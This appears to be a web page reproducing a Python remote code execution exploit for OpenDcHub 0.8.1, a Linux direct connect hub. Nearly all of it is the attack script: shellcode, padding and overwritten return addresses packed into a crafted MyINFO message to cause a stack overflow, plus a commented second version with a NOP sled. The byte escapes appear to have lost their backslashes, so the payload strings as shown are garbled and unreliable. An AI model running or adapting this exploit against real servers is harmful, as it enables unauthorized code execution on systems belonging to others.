Twitter Facebook Google Plus Linkedin email

OpenDCHub 0.8.1 Remote Code Execution Exploit

#!/usr/bin/python
#
# OpenDcHub 0.8.1 Remote Code Execution Exploit
# Pierre Nogues - http://www.indahax.com
#
# Description:
#     OpenDcHub is a direct connect hub for Linux
#
#     OpenDcHub doesn't handle specially crafted MyINFO message which lead to a stack overflow.
#
# Affected versions :
#     OpenDcHub 0.8.1
#
# Plateforms :
#     Unix
#
# Usage :
#     ./exploit.py

import socket

host = '192.168.1.9'
port = 5000

# must not contain x36 x53 x00 bytes
# max shellcode size = 103 bytes use exploit v2 otherwise
shellcode="x33xc9xb1x13xbaxf6x1dxe7xfaxdbxdexd9x74x24"
shellcode+="xf4x5ex83xc6x04x31x56x0ax03xa0x17x05x0fx7d"
shellcode+="xf3x3ex13x2ex40x92xbexd2xcfxf5x8fxb4x02x75"
shellcode+="xb4x66xf5xb6xe3x97x37x51x9cx86x6bxfbx0fxc2"
shellcode+="x83x52xe0x9bx45x17x6axfdxddx55xeax58x59xbc"
shellcode+="x5bx65xa8xbfxd5xe0xcbx90x8dx3dx03x62x26x29"
shellcode+="x74xe6xdfxc7x03x05x4fx44x9dx2bxc0x61x50x2b"
shellcode+="x2b"

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, port))
s.send("$ValidateNick joseph|")

hax="$MyINFO $ALL joseph "
hax+=shellcode
for i in range(103 - len(shellcode)):
    hax+="A"
hax+="$"
hax+="x20x81x81x80" # esp
hax+="xedxf6xfexbf" # eip
hax+="S:-1|"

s.send(hax)
s.close()

"""
# V2
# more complex version working too, it have more space for the shellcode

hax="$MyINFO $ALL joseph AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
hax+="xFFxFFxFFxFE" # local var int len of commands.c:my_info() must be a negative value
hax+="TTTTUUUUVVVVWWWWXXXXYYYYZZZZBBBBCCCCEEEEEEE$"
hax+="x20x81x81x80" # esp
hax+="x80xf7xfexbf" # eip
hax+="xCCxCCxCCxCC" # useless var
hax+="x10xf0xfexbf" # this address + x20 will be overwritten by 4 bytes
# shellcode time
hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
hax+="x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90x90"
hax+=shellcode
hax+="|"
"""